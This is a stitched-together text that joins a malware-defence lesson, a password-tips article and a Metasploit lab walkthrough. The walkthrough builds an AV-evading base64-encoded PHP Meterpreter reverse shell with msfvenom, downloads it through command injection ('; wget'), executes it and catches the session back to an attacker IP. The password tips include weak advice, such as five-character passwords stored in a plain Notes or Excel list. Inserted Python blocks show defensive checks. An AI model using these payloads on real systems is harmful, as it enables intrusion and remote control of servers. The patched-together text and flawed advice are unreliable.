      Fixing a system after it has been infected by a virus might be accomplished in a number of different ways, depending upon the virus and the nature of the damage that it has done to the system. 

      Ideally, we would want to disinfect the system by removing the virus from any infected programs without damaging the programs themselves. Unfortunately, this can only be accomplished if the virus code can be separated from the program code and if the virus did not corrupt the program.

      If the virus cannot be separated from the program file, then the file must be permanently deleted. If one or more files are deleted by the virus itself or in the process of disinfecting the system, then restoring the system to its original state will require that we recover or replace all of the deleted files. 

      This emphasizes the need to maintain file backups, especially of important files. Without backup copies of the files that have been deleted either by the virus itself or as a consequence of the disinfection process, it will be extremely difficult to restore a system to its original state. 

      Identifying When a Digital Object Has Been Modified by Malware

      Among the most important tools that we have available for identifying when a digital object has been modified by malware are error-detecting codes. There are several varieties of these error-detecting codes, including parity bits, checksums, and cryptographic checksums, which, when used properly, can help us to detect when a program or file has been surreptitiously altered by a malware program. 

      A parity bit or a check bit is the simplest form of error detecting code. The process involves appending a single bit of data, either a zero or a one to a string of binary data, in order to indicate whether the number of ones in the string is even or odd. 

      If the binary data in the string has been altered, then there is a 50% chance that the parity bit will detect the modification. A checksum is a value that is computed by running a file through a hash function or a checksum algorithm.

      Because the hash function or checksum algorithm will produce different values for different combinations of input data, the integrity of a file can be verified by computing the file's checksum and comparing the result to a known checksum value. If the two values differ, then we can be reasonably sure that the file has been modified.

       The developers of malware are, of course, generally quite clever, and many of these clever developers have found ways of modifying programs or files, such that they generate the same checksum value as the unmodified program or file, thus making it appear as if the program or file has not been altered. 

      For this reason, a cryptographic hash function can be used to generate a checksum value that has an extremely low probability of being duplicated after a file has been modified. It is also important to note that, under certain circumstances, error-correcting codes can be used to restore programs or files that have been surreptitiously altered to their original state without requiring a clean, unmodified copy of the original object.
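
      The three kinds of error-detecting code compared above, as an added example (not from the original article): a parity bit, a toy additive checksum and SHA-256 are applied to constructed modifications of one byte string, followed by a small baseline-and-verify check over a temporary directory. The `sum16` checksum, the file names and the sample data are assumptions chosen for illustration.

```python
"""Parity bit, simple checksum and SHA-256 compared on constructed data."""
import hashlib
import os
import tempfile


def parity_bit(data: bytes) -> int:
    """Even-parity bit: 1 if the number of 1 bits in data is odd, else 0."""
    return sum(bin(b).count("1") for b in data) % 2


def sum16(data: bytes) -> int:
    """Toy checksum: sum of all bytes modulo 65536 (not collision resistant)."""
    return sum(data) % 65536


def sha256_hex(data: bytes) -> str:
    """Cryptographic checksum of the data."""
    return hashlib.sha256(data).hexdigest()


def changed_codes(original: bytes, modified: bytes) -> set:
    """Names of the codes whose value differs, i.e. that detect the change."""
    codes = {"parity": parity_bit, "sum16": sum16, "sha256": sha256_hex}
    return {name for name, fn in codes.items() if fn(original) != fn(modified)}


def build_baseline(root: str) -> dict:
    """Map each file's path (relative to root) to its SHA-256 digest."""
    baseline = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            with open(path, "rb") as fh:
                baseline[os.path.relpath(path, root)] = sha256_hex(fh.read())
    return baseline


def verify(root: str, baseline: dict) -> dict:
    """Compare the tree against a baseline: modified, missing and added files."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline
                           if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "added": sorted(p for p in current if p not in baseline),
    }


# Constructed sample data.
ORIGINAL = b"PAY 100 TO ALICE"
ONE_BIT = b"QAY 100 TO ALICE"    # 'P' -> 'Q': a single bit flipped
TWO_BITS = b"SAY 100 TO ALICE"   # 'P' -> 'S': two bits flipped, parity unchanged
SAME_SUM = b"PAY 001 TO ALICE"   # bytes reordered: parity and sum16 unchanged


def demo_file_check() -> dict:
    """Baseline a constructed directory, alter it, and report the drift."""
    with tempfile.TemporaryDirectory() as root:
        files = {"app.bin": ORIGINAL, "lib.dll": b"\x00" * 32, "readme.txt": b"hi"}
        for name, body in files.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        # In practice the baseline is kept off the monitored host, because
        # malware running with elevated privileges could rewrite it.
        baseline = build_baseline(root)
        with open(os.path.join(root, "app.bin"), "wb") as fh:
            fh.write(SAME_SUM)   # same length and sum16, different SHA-256
        os.remove(os.path.join(root, "readme.txt"))
        with open(os.path.join(root, "unexpected.tmp"), "wb") as fh:
            fh.write(b"new file")
        return verify(root, baseline)


if __name__ == "__main__":
    for label, data in [("one bit", ONE_BIT), ("two bits", TWO_BITS),
                        ("same sum", SAME_SUM)]:
        print(f"{label:9} detected by: {sorted(changed_codes(ORIGINAL, data))}")
    print(demo_file_check())
```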


      Reducing Harm from Malware Infections


      In addition to checking whether digital objects such as programs or files have been surreptitiously modified, there are also several mechanisms that can be used to reduce or contain the harm caused by a malware infection. 

      First among these is the principle of least privilege. This principle states that users should have access to the minimum number of digital objects and system capabilities necessary in order to perform the tasks that they need to perform. 

      A malware program that runs with the authority of a system administrator has the potential to cause much more harm than if the same malware program were run with the authority granted to a low-level user account. 

      Second among these mechanisms is the principle of complete mediation. This principle states that we should check whether a user is allowed to use a digital object each and every time access to the digital object is requested. 

      Finally, we have the mechanism of memory separation. When implemented properly, memory separation ensures that each user's digital objects are isolated in memory from other users' objects, thus preventing cross-contamination. It is important to realize that most single-user systems, such as home computers, laptops, tablets, and so forth, are not properly configured to capitalize on hierarchical code sensitivity and capability, since most people use a single user account on their personal computing devices, which has high-level administrative access to the system. 

       

      How to Be Secure from Malware..? 


      Just as with Malware infections, adopting proper malware hygiene can help us to substantially improve our chances of avoiding a malware infection. 

      •  It's good practice to use up to date anti-malware software that has been supplied by a trustworthy vendor.
      • New or unknown software programs should always be tested on an isolated device if possible, especially if the software is to be used in an organizational environment. 
      •  Users should be trained to recognize and open only safe attachments and data files. 
      • Users should be made aware that any website might be harmful, even if the website has been safe in the past.
      •  If restoration of the system becomes necessary, it's important to keep a recoverable system image in a safe place and to have backup copies of executable system files available. 
      Even with all of these hygienic precautions, there are still no absolute guarantees that we can avoid a malware attack. By following these steps, however, we can vastly reduce our chances of acquiring a malware infection.

      Interesting facts about Malware

      As food for thought in our consideration of malicious code, I would like to discuss some truths about malware. 

      • Malware can infect any platform. 
      For many years, there has been a persistent belief that devices running Mac OS or iOS operating systems are immune to malware attacks. This belief is absolutely false. All computing systems can be affected by malware. 
       
      • Malware programs can modify hidden and read-only files. 
      Many people believe that if a file is hidden or marked as read-only, then it will be immune to modification by malware. Remember that malware programs often run with elevated privileges, and can easily change whether a file is hidden or read-only. 
      •  Malware can appear anywhere in a system. 
      Many of the developers of malicious programs are extremely intelligent and extremely talented, and there are hence no dark corners anywhere in a computer system that are immune to malware. 
       
      •  Malware can spread anywhere where file or data sharing occurs. 
      Malware programs have many ways to propagate themselves, and we should therefore not expect any communications channel to be safe from malware.
       
      • It is not possible for malware to remain in volatile memory after the power to a system has been completely switched off. 
      Nevertheless, if a malware program is saved on a disk or a solid-state drive, for example in the boot sector, then it may reappear when the power is restored. 
       
      • It is possible for malware to infect the software that runs hardware devices. 
      Firmware viruses do exist. 
       
      • Malware can be malevolent, benign, or benevolent. 
      Although the vast majority of malware is written with malicious intent, the same techniques that are used to develop malware programs, such as viruses and worms, can be used to achieve positive or munificent objectives. 
       
      As an example, consider this question. Would you mind having a  virus living on your system? 
       
      Well, this ends our overview of malicious code. I hope that you learned something interesting in this lesson. 
       Have a great day.

      and Happy Hacking...


       As technology advances over time, it has been put to positive use in helping companies sell services and products and in improving websites. But it has also been used negatively by culprits to "crash" websites and businesses, and even to hack passwords to software.

       As a growing number of website hacks and malware attacks are reported in the news, the harmful impact brought about by technology continues to rise. System hacking is one of the most common issues nowadays.  

      Cyber Security Threats


      To address this problem, security concerns and issues have been tackled, because the Internet is now widely used by people from all walks of life. Whether a business is large or small, proper attention should be given to protecting and safeguarding all of its network software against corrupt hackers.

       That is why it is vitally important that every system operator or administrator use a distinctive password that can't be hacked by either an ordinary destroyer or a professional hacker. One should be vigilant against unexpected hackers as early as possible.


      Basically, a person who hacks commonly destroys software and computer networks in order to gain money, or simply for the challenge. To avoid incidents such as hacked passwords, you should take some precautionary measures, not only for your system's protection but for your own safety as well.

       That is why a strong password is a must for the privacy and security of your website. It ensures the confidentiality and safety of your saved data. It is the user's responsibility to make a password as unique as possible, so that it is hard for anyone to guess or discover.


      To keep your password from being hacked, consider the following points when creating it.

       

       

      avoid hacking on your password


      1. When creating a password, you should enter mixed information, as you would for your credit card or bank account, or an assumed name that is unusual.


      2. A second good piece of advice is to use an alphanumeric password: a combination of numbers and letters, even mixed with symbols. For higher security, at least two of the letters that you enter should be uppercase.


      3. A password should be hard to guess, so that neither programs nor other people can quickly discover it.


      4. The password should not be an existing name in any language.


      5. Don't use your initials, your date of birth or other common words, because they can be easily guessed.


      6. Don't use other older accounts.


      7. The password should be 5 digits or more for additional security.


      8. Do not use common passwords.


      9. If you have two or more email accounts, use a different password for each. Be sure to memorize each password in full to avoid failures.


      10. Last but not least, keep a list, in a commonly used program such as Notes, Excel or Word, of all your websites, mailboxes and subscriptions, each mapped to its right place or location. Your passwords and usernames should be neat and properly organized so that you can use them immediately.


      After creating a password for your account, you should also consider how to secure your valuable website against accidental attacks and cruel hackers. The following are the pointers to consider:

       

      Protect Yourself



      1. Install virus protection software to fully safeguard your website.


      2. Change your password regularly, always choosing alphanumeric words. To avoid mistakes, be sure that you keep a list of every password and username that you create.


      3. Keep your security patches up to date to avoid harmful viruses, such as Trojans, that might enter your systems.


      4. Connect to Google Webmaster, which will help you learn about different hacking attempts.


      5. Lastly, you should always have backups to restore the data you save.


      After reading the entire article, make sure that you follow those helpful tips so that you can always be ready and alert for any hacking attempts. 

      It's up to you whether you follow them or not, but they give you maximum protection for your software, network and even the website you have invested in. 

      If your top priority is to stay away from hackers who hack passwords, then you should bear in mind and act on the easy and simple tips above.


       Let us actually get started with some of our first exploitations. So what you want to do is open up your msfconsole, first of all open up our OWASP virtual machine as well. So for me it is already up and running. If it is not for you, you want to open it. And let's go open up our Firefox for a moment. Now what we will be doing in this tutorial is basically I will show you how you can get the meterpreter shell back with the command injection attack.


       I will also show you how to do the same thing with the PHP injection vulnerability. Now we didn't cover PHP code injection, but it is simple, and it is almost the same as the other injections that we did before. So it is just injecting a certain type of code into a browser that isn't very well filtered, so the user input is also read as code. 

      So let us, first of all, go to the OWASP virtual machine. My IP is 192.168.56.11. It will open up our standard OWASP virtual machine welcome page, where we have all of the stuff that we need. We want to go to bWAPP right here. Now the login is the same as before, so bee and then bug right here in order to log in. Press Enter, and you are logged into bWAPP. Then choose OS command injection.



      So we will use burpsuite as well with the mixture of Metasploit, and with the mixture of the OWASP virtual machine. So we will be able to inspect packets in burp suite, and we will be sending some of the other stuff into the website, such as our meterpreter shell, and such as some of the other commands.  

      So before we do any of that, just go to the proxy intercept and turn the intercept off so we can load the pages properly. Now when we go to the page and we reloaded once again, we successfully connect to it. And here what we  chose is the OS command injection. 

      And right here we are performing the DNS lookup. So let's see what happens when we just run this with the default server right here. We can see a server and then this IP address, so this is basically the router, and then we have some of the other options as well. So the IP address at the end is this one; it doesn't even matter. So what matters for us is what happens if we run that. And then after that, we also specify ls, which is the command to list all of the directories and files in that subdirectory. So we click here with ls, and just as simple as that we can now see that this website is vulnerable to the command injection. 
      OS command injection
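
      The flaw seen in this step, next to its fix, as an added example (not part of the original tutorial and not bWAPP's own PHP code): the same lookup-handler pattern sketched in Python. It shows how a shell splits the concatenated string into two commands, and how allow-list validation plus a shell-free argument vector closes the hole. The `nslookup` command name, the `;` separator in the constructed sample input and all function names are assumptions made for illustration.

```python
"""Allow-list validation for a DNS-lookup form field, with no shell involved."""
import re
import shlex
import subprocess

# One DNS label: letters, digits and hyphens, 1-63 chars, no leading/trailing hyphen.
LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
SHELL_OPERATORS = {";", "|", "||", "&", "&&"}


def is_valid_hostname(value: str) -> bool:
    """Accept only RFC 1123 style host names; everything else is rejected."""
    if not value or len(value) > 253:
        return False
    return all(LABEL.fullmatch(label) for label in value.split("."))


def shell_commands(command_line: str) -> list:
    """Split a command line into the separate commands a POSIX shell would run."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SHELL_OPERATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def vulnerable_command(target: str) -> str:
    """The flawed pattern: user input pasted into a string handed to a shell."""
    return "nslookup " + target


def safe_argv(target: str) -> list:
    """Validate first, then build an argument vector that never reaches a shell."""
    if not is_valid_hostname(target):
        raise ValueError("rejected lookup target")
    return ["nslookup", target]


def lookup(target: str) -> str:
    """Run the lookup with no shell: the input is one argv element, nothing more."""
    result = subprocess.run(safe_argv(target), capture_output=True, text=True,
                            timeout=5, check=False)
    return result.stdout


# Constructed input modelled on the walkthrough: a host name followed by "ls".
FORM_INPUT = "www.example.com; ls"

if __name__ == "__main__":
    print("shell would run:", shell_commands(vulnerable_command(FORM_INPUT)))
    try:
        safe_argv(FORM_INPUT)
    except ValueError as exc:
        print("hardened handler:", exc)
    print("hardened argv:", safe_argv("www.example.com"))
```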


      It also specified all of the files that it has in that directory on its machine, which it shouldn't be specifying. So now that we know that, what we want to do next is basically we want to make a meterpreter shell that is basically running over PHP. 
      Now, why over PHP? 
      As we can see right here all these files are in .PHP, and we can actually upload the shell on this web server, and run it, make the web server connect to our virtual machine. So let us do that by starting off with creating the meterpreter PHP shell. 

      So this is where we introduce, for the first time, the msfvenom tool, which we will use in order to create the meterpreter shell. So we need to leave this and let's open a new terminal. 

      msfvenom

       and then after that, basically, if you want to you can just type --help. I believe it will print the available options, but let's not bother with this at the moment. Just follow with what I'm typing and I will explain while I'm going through it.

      #msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -e php/base64 -f raw > shell.php

       So msfvenom... now -p option will actually after that specify the payload that you will use. So we want to use PHP meterpreter and then reverse TCP. So php/meterpreter/reverse_tcp. 

      Reverse TCP working

       I made a simple illustration of what our reverse TCP shell means. So we have our PC right here which is the attacker's PC. This is our good old Kali Linux machine that's for the attacker. And here we have the victim machine which we are attacking. So we want to send the shell to the victim machine. This is in our case the OWASP virtual machine, 

      So the problem with connecting, just simply connecting to the open port, is that this machine might have a firewall around it. Not might, basically all of the machines. All of the networks nowadays have firewalls, but what firewall cannot prevent is the victim machine connecting back to us. 

      Now how will we do that? 

      What we want to do is we want to send the file to this machine right here. The file, so shell.php is that file and we sent it to the victim machine, and what that file would do is basically it will initiate the connection with us. 
      So this file when it is run on the victim machine, or when it is started up on the machine, it will try to connect to us. So the firewall won't be able to stop it since the victim machine itself tried to connect to us. And while it tries to connect to us we will be listening for the outgoing or incoming connections. And once this program is started it will connect back to us, and we will be able to communicate with this machine and execute commands in it, and so on and so on. 

      But you might be asking, how are we going to get that file on the victim machine? 

      Well, that is simple. If the victim machine is vulnerable to the PHP code injection or to the OS command injection, we will be able to execute it just by making the machine download it with command injection. 

      But if, for example, the machine isn't vulnerable to anything, which we will cover in the later articles when the machine doesn't have any vulnerability, the only way for the victim to download that file is if it clicks on the download button and if it runs it itself. We will not be able to run the file for the victim itself. Or, there is another way. If the victim is physically close to you, you can actually take your USB drive, transfer the file onto the USB drive, and transfer to the victim machine while they are not looking, or something like that, and then run the file. And basically, you just did all of this process by yourself, just being physically on their laptop or on their PC. 

      So, I hope you understood this. So, the basic idea behind this is that the victim is trying to connect back to us with our malware program, or with our PHP meterpreter shell. 
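
      Seen from the defender's side, the connection described above is an outbound connection started by the web server's own account, which is rare in normal operation. As an added example (not part of the original tutorial), the following detection logic runs over constructed connection records and flags egress by the web server account to anything outside an allow-list. The log format, account names and allow-list entries are assumptions; the addresses and port reuse the lab values from this walkthrough.

```python
"""Flag outbound connections started by a web server account (constructed logs)."""
import ipaddress
import re

# Constructed record format for this example, not the output of a real tool.
LINE = re.compile(
    r"(?P<ts>\S+) uid=(?P<uid>\S+) proc=(?P<proc>\S+) dir=(?P<dir>in|out) "
    r"dst=(?P<dst>\S+) dport=(?P<dport>\d+)$"
)

WEB_ACCOUNTS = {"www-data", "apache"}                    # assumed service accounts
ALLOWED_EGRESS = [                                       # assumed egress policy
    (ipaddress.ip_network("192.168.56.1/32"), 53),       # DNS resolver
    (ipaddress.ip_network("192.168.56.20/32"), 3306),    # database server
]


def parse(line: str):
    """Parse one record into a dict, or return None if it is malformed."""
    match = LINE.match(line.strip())
    if not match:
        return None
    rec = match.groupdict()
    try:
        rec["dst"] = ipaddress.ip_address(rec["dst"])
    except ValueError:
        return None
    rec["dport"] = int(rec["dport"])
    return rec


def is_allowed(dst, dport: int) -> bool:
    """True if the destination and port are covered by the egress allow-list."""
    return any(dst in net and dport == port for net, port in ALLOWED_EGRESS)


def suspicious_egress(lines) -> list:
    """Return (ts, uid, proc, dst, dport) for web-account egress off the allow-list."""
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None or rec["dir"] != "out":
            continue
        if rec["uid"] in WEB_ACCOUNTS and not is_allowed(rec["dst"], rec["dport"]):
            alerts.append((rec["ts"], rec["uid"], rec["proc"],
                           str(rec["dst"]), rec["dport"]))
    return alerts


# Constructed sample records.
SAMPLE_LOG = """\
2020-05-01T10:15:00 uid=www-data proc=apache2 dir=in dst=192.168.56.11 dport=80
2020-05-01T10:15:01 uid=www-data proc=php dir=out dst=192.168.56.1 dport=53
2020-05-01T10:15:02 uid=www-data proc=php dir=out dst=192.168.56.20 dport=3306
2020-05-01T10:15:05 uid=www-data proc=wget dir=out dst=10.0.2.15 dport=80
2020-05-01T10:15:07 uid=www-data proc=php dir=out dst=10.0.2.15 dport=4444
2020-05-01T10:16:30 uid=root proc=apt dir=out dst=10.0.2.2 dport=443
this line is malformed and is skipped
""".splitlines()

if __name__ == "__main__":
    for alert in suspicious_egress(SAMPLE_LOG):
        print("ALERT", alert)
```

      The matching preventive control is a default-deny egress policy for the web server account, so that such connections are blocked as well as logged.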

      So let us continue now with actually making this. Now the name of that shell is meterpreter. We will use it with PHP and we use the reverse TCP connection. Now there are some of the other options as well but we will use these ones for now. 

      Now after you specify all of this, the next thing we want to specify is the localhost IP address. Now, what is the localhost IP address? That is the IP address of the host that's listening, which in this case is you. So you as an attacker are the listening host. So, what we need to specify right here is LHOST, then equals, and then the IP address. So let me just check what the IP address is from this machine. So ifconfig... And then we specify 10.0.2.15. 

      And after that, we need to specify the LPORT as well, and that is the port that you are listening on. It is also your port. So, by default Metasploit is set on the 4444 port, so we will just keep with that. So just 4444, select that, and after that, you can select some of the other options that are actually optional. 

      So, we will select that so I can just show you. For example, let's use the encoder. Now the encoder...I covered what an encoder is in the previous article. So basically it's used to most likely bypass antiviruses, which actually we do not need in this case but I will show you how you can use it. So the encoder will scramble the code, we will not be able to see the code itself in raw format. We will be seeing scrambled, encrypted code. So the encoder that I will use is php/base64. 

      What else we want to specify at the end is -f, and then the file to be raw, and after that, we want to specify this arrow (>) and just save that into shell.php. Once we select all of this and once we double-check all of the options that we set, you can press Enter here, and this will take a few seconds to finish. 

      So, our meterpreter PHP shell is now 1503 bytes large. If you type ls here, you'll be able to see it is right here. So this is our shell.php, this is our malware, and this is the program that we will send to the victim machine. We created it with this command. Now there are a few things that you need to do when you make the PHP reverse shell. 

      First of all, you need to add the PHP tag, since it doesn't come with that. So, this is the scrambled code. This is basically Base64 encoded code, as we can see right here. This is the function that is used to decode the Base64. We can see this doesn't look anywhere close to a programming language, but that is why we use the encoder, so it doesn't get detected by antivirus on legit websites. So, what we want to do is add the PHP tag. First of all, up here we want to add the opening tag: a less-than sign, then a question mark, and then php (<?php). And at the end, we want to add the question mark and then the closing tag (?>). You need to add this in order for the machine to recognize this as PHP code. So, Ctrl + O to save, Ctrl + X to exit. 
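Seen from the defending side, Base64 wrapping only defeats scanners that match on the raw text; a scanner that decodes the literal first sees the original code again. The following is an added example, not part of the original tutorial: it peels base64_decode() literals out of a PHP file and looks for network and code-execution functions in every layer. The function names, the indicator list and the sample file are constructed for illustration, and it assumes the encoded body is a single Base64 literal.

```python
import base64
import re

# base64_decode( followed by a literal, with or without quotes.
B64_CALL = re.compile(r"base64_decode\(\s*['\"]?([A-Za-z0-9+/]{16,}={0,2})", re.I)
# Functions that open network connections or run code/commands once decoded.
INDICATORS = ("fsockopen", "stream_socket_client", "socket_create",
              "eval(", "system(", "shell_exec(", "passthru(", "proc_open(")

# Constructed, inert fragment standing in for an encoded payload body.
_INNER = '$s = fsockopen("192.0.2.10", 4444);'
SAMPLE = ("<?php eval(base64_decode('"
          + base64.b64encode(_INNER.encode()).decode() + "')); ?>")

def decode_layers(php_source, max_depth=3):
    """Peel nested base64_decode() literals; return every decoded layer."""
    layers, current = [], php_source
    for _ in range(max_depth):
        m = B64_CALL.search(current)
        if not m:
            break
        blob = m.group(1)
        blob = blob[: len(blob) - len(blob) % 4]  # drop a ragged tail
        current = base64.b64decode(blob).decode("utf-8", "replace")
        layers.append(current)
    return layers

def inspect(php_source):
    """Return indicators found in the file itself or in any decoded layer."""
    hits = set()
    for text in [php_source] + decode_layers(php_source):
        lowered = text.lower()
        hits.update(i for i in INDICATORS if i in lowered)
    return sorted(hits)

if __name__ == "__main__":
    print(inspect(SAMPLE))
```

Run over every .php file in the web root, a non-empty result on a file nobody deployed is a strong reason to quarantine and review it.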




      And now we are good to go. The only thing we need to do right now is put this file somewhere it can be downloaded from. That place would be the XAMPP Apache 2 web server. So you want to send this to your XAMPP web server. So let us go to /opt/lampp/htdocs/, which is the location of all the programs that are available on your XAMPP web server. Take whatever the path to your shell.php is and move it to /opt/lampp/htdocs/. I made one folder named shell, so my directory is /opt/lampp/htdocs/shell. And we can see that right now we have this shell.php right here. 

      Now the next thing we want to do is make sure that XAMPP is running. We can see that it is active and running. And right now what we want to do is go to our IP address, which is localhost/shell, and we can see that right here we have the shell.php file available online.

      Now we want to make the victim PC actually download this file. So how do we do that? Since it is vulnerable to command injection, what you want to do is use a simple tool that is on all Linux systems, which is called wget. Now, wget is basically used to download files. And let's actually go to root and mkdir test, and go to test. Here we do not have anything. But if we run this command, wget, and then localhost, we need to specify what we are downloading. So we need to specify /shell.php, since that is the name of our file that is located in the www/html folder.
      Which looks like this:
       
      wget  localhost/shell/shell.php
       
       
      We press Enter here and this will download the file for us. As we can see, it downloaded shell.php with just this one simple command. So if I type ls here once again, we can see that shell.php is in our folder. So now if we cat it, we can see that we get the entire file right here. 

      Now, this was only the problem with the Apache 2 from my Kali Linux web server. So don't mind this, you should be good to go. And let us continue with the attack. So right now what we want to do is perform the command injection. 
       
      So we know that there is a vulnerable input, and let's actually exploit it right now.
      And let us right now type the same command. So
       
      ;wget localhost/shell/shell.php 
       
      Now try to find out whether it successfully downloaded shell.php. It should be somewhere around. So we successfully got the shell.php file onto our target machine with a simple command. And we didn't have to make anyone click on anything, and we didn't have to make any physical contact with that machine. Now in order to execute this file, you will need to type a certain command. But before we type that command, we need to start listening on a certain port. 
       
      So let us open our msfconsole so we can continue with this attack. Right now before we execute the shell.php on the victim, we want to start our listener in our Metasploit framework. So this is opening. What you want to use right here is something called exploit multi/handler. 
       
      So this is something that you will use a lot. Just type here

       use exploit/multi/handler


       
       
      If you show options, you can see that there are no options right here. So what you want to do is set the payload, 

      set payload php/meterpreter/reverse_tcp 
       
      And we can see that we get the LHOST to listen on. Now double-check against the command we used while making shell.php that the LPORT is 4444 and the LHOST is the IP address of our own machine. So we listen for our own connection. So 

      set LHOST 10.0.2.15 
       

       
       
      And all I need to do right now is type exploit here, and this will wait for an incoming connection. So right now we are waiting for someone to run that program on the target machine. But since nobody will really do it, we have to do it ourselves. And we can do it, since that server is vulnerable to command injection. So just type a semicolon, and then what we want is basically php -f and then shell.php. This command right here will run the PHP file. 
       
      ;php -f shell.php
       
      And we can see that if I press Lookup here, we get meterpreter session 1 opened. We can see right here that this is a connection from our OWASP virtual machine, shown with its IP address, and the other IP address is our Kali Linux machine. So we successfully got meterpreter open. Now that will be about it for this tutorial. We will cover the other exploits as well, and we will also show what we can do with a meterpreter session open: what we can execute, what post-exploitation tools we can use, and so on. So that's about it for now. I hope I see you in the next tutorial, and take care.
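Seen from the defending side, the two injected commands above (;wget ... and ;php -f ...) leave a recognisable trace in the web server's access log. The following is an added example, not part of the original tutorial: it scans combined-format log lines for a query parameter that chains wget, php or a similar tool after a shell metacharacter. The log lines, the /lookup.php path and the host parameter are constructed, and it assumes the vulnerable field is sent in the query string (a POST body would not appear in the access log).

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Shell metacharacters that chain a second command onto the intended one.
CHAIN = r"(?:;|\|\||&&|\||&|`|\$\(|\n)"
# Tools used in the tutorial's injection (wget, php) plus common equivalents.
TOOLS = r"(?:wget|curl|php|nc|ncat|bash|sh|python\d?|perl)"
INJECTION = re.compile(CHAIN + r"\s*" + TOOLS + r"\b", re.IGNORECASE)

# Combined log format: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines; path and parameter name are hypothetical.
SAMPLE_LOG = [
    '10.0.2.15 - - [01/Jan/2020:10:00:00 +0000] '
    '"GET /lookup.php?host=example.com HTTP/1.1" 200 512',
    '10.0.2.15 - - [01/Jan/2020:10:01:00 +0000] '
    '"GET /lookup.php?host=%3Bwget+localhost%2Fshell%2Fshell.php HTTP/1.1" 200 530',
    '10.0.2.15 - - [01/Jan/2020:10:02:00 +0000] '
    '"GET /lookup.php?host=%3Bphp+-f+shell.php HTTP/1.1" 200 0',
]

def suspicious_params(url):
    """Return (name, decoded value) for parameters that chain a command."""
    query = urlsplit(url).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if INJECTION.search(v)]

def scan(lines):
    """Return (client_ip, parameter, decoded value) for each flagged request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line
        for name, value in suspicious_params(m["url"]):
            findings.append((m["ip"], name, value))
    return findings

if __name__ == "__main__":
    for ip, name, value in scan(SAMPLE_LOG):
        print(f"{ip} param={name!r} value={value!r}")
```

A download request followed shortly by a php -f request from the same client, as in the sample, is the sequence this walkthrough produces and is worth alerting on as a pair.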